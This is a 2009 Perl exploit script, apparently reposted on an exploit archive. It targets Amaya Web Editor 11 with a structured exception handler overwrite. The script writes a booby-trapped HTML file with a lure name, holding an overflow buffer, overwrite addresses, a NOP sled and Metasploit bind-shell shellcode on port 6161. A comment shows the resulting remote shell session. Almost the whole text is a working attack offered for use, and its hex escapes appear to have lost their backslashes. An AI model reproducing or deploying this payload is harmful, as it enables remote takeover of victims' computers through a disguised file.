Home / os / win10

amaya-seh.txt

Posted on 30 January 2009

#!/usr/bin/perl
#
# Title: Amaya Web Editor 11 Remote SEH Overwrite Exploit
#
# Summary: Amaya is a Web editor, i.e. a tool used to create and update documents directly on the Web.
#
# Product web page: http://www.w3.org/Amaya/
#
# Tested on Microsoft Windows XP Professional SP2 (English)
#
# Reference: http://www.milw0rm.com/exploits/7906
#
# Exploit coded by Gjoko 'LiquidWorm' Krstic
#
# liquidworm [t00t] gmail [w00t] com
#
# 30.01.2009
#
#------------------------------------------------------------------
#
# lqwrm@zeroscience:~$ telnet 192.168.1.101 6161
# Trying 192.168.1.101...
# Connected to 192.168.1.101.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:Program FilesAmayaWindowsWXin>dir
#  Volume in drive C is System
#  Volume Serial Number is D484-8540
#
#  Directory of C:Program FilesAmayaWindowsWXin
#
# 29.01.2009  19:27    <DIR>          .
# 29.01.2009  19:27    <DIR>          ..
# 16.12.2008  14:44         5.816.320 amaya.exe
# 16.12.2008  14:41         1.290.240 thotprinter.dll
# 19.08.2008  11:02           135.168 wxbase28u_net_vc_custom.dll
# 19.08.2008  11:01         1.220.608 wxbase28u_vc_custom.dll
# 19.08.2008  11:02           135.168 wxbase28u_xml_vc_custom.dll
# 19.08.2008  11:03           741.376 wxmsw28u_adv_vc_custom.dll
# 19.08.2008  11:03           286.720 wxmsw28u_aui_vc_custom.dll
# 19.08.2008  11:01         3.018.752 wxmsw28u_core_vc_custom.dll
# 19.08.2008  11:02            49.152 wxmsw28u_gl_vc_custom.dll
# 19.08.2008  11:02           524.288 wxmsw28u_html_vc_custom.dll
# 19.08.2008  11:03           593.920 wxmsw28u_xrc_vc_custom.dll
#              11 File(s)     13.811.712 bytes
#               2 Dir(s)   7.520.141.312 bytes free
#
# C:Program FilesAmayaWindowsWXin>
#
#------------------------------------------------------------------



my $start = "<html>" . "
" . '<bdo dir="' . "
";

my $junk = "x41" x 10556;

my $seh = "xc5x87x85x7c";	#0x7c8587c5     pop pop ret kernel32.dll - (SE handler) - EIP
#0x7c941eed     jmp esp kernel32.dll
#0x7c836960      call esp kernel32.dll
#0x7c85d568      call esp kernell32.dll
# ...

my $next_seh = "xebx06x90x90";	#0x909006eb     jmp+0x06 - (Pointer to next SEH record)

my $nop = "x90" x 50;

# win32_bind -  EXITFUNC=seh LPORT=6161 Size=344 Encoder=PexFnstenvSub http://metasploit.com
my $sc = "x2bxc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xb0".
"x6bx3ax1ex83xebxfcxe2xf4x4cx01xd1x53x58x92xc5xe1".
"x4fx0bxb1x72x94x4fxb1x5bx8cxe0x46x1bxc8x6axd5x95".
"xffx73xb1x41x90x6axd1x57x3bx5fxb1x1fx5ex5axfax87".
"x1cxefxfax6axb7xaaxf0x13xb1xa9xd1xeax8bx3fx1ex36".
"xc5x8exb1x41x94x6axd1x78x3bx67x71x95xefx77x3bxf5".
"xb3x47xb1x97xdcx4fx26x7fx73x5axe1x7ax3bx28x0ax95".
"xf0x67xb1x6exacxc6xb1x5exb8x35x52x90xfex65xd6x4e".
"x4fxbdx5cx4dxd6x03x09x2cxd8x1cx49x2cxefx3fxc5xce".
"xd8xa0xd7xe2x8bx3bxc5xc8xefxe2xdfx78x31x86x32x1c".
"xe5x01x38xe1x60x03xe3x17x45xc6x6dxe1x66x38x69x4d".
"xe3x38x79x4dxf3x38xc5xcexd6x03x22x0fxd6x38xb3xff".
"x25x03x9ex04xc0xacx6dxe1x66x01x2ax4fxe5x94xeax76".
"x14xc6x14xf7xe7x94xecx4dxe5x94xeax76x55x22xbcx57".
"xe7x94xecx4exe4x3fx6fxe1x60xf8x52xf9xc9xadx43x49".
"x4fxbdx6fxe1x60x0dx50x7axd6x03x59x73x39x8ex50x4e".
"xe9x42xf6x97x57x01x7ex97x52x5axfaxedx1ax95x78x33".
"x4ex29x16x8dx3dx11x02xb5x1bxc0x52x6cx4exd8x2cxe1".
"xc5x2fxc5xc8xebx3cx68x4fxe1x3ax50x1fxe1x3ax6fx4f".
"x4fxbbx52xb3x69x6exf4x4dx4fxbdx50xe1x4fx5cxc5xce".
"x3bx3cxc6x9dx74x0fxc5xc8xe2x94xeax76x40xe1x3ex41".
"xe3x94xecxe1x60x6bx3ax1e";

my $end = '">' . "
" . "t00t</bdo>" . "
" . "</html>";

my $file= "Slumdog_Millionaire.html";

$payload = "$start" . "$junk" . "$next_seh" . "$seh" . "$nop" . "$sc " . "$end";

open (exploit, ">./$file") or die "Can't open $file: $!";

print exploit "$payload";

close (exploit);

print "	
 - $file successfully created!
";

 

TOP

Malware :

Exploits :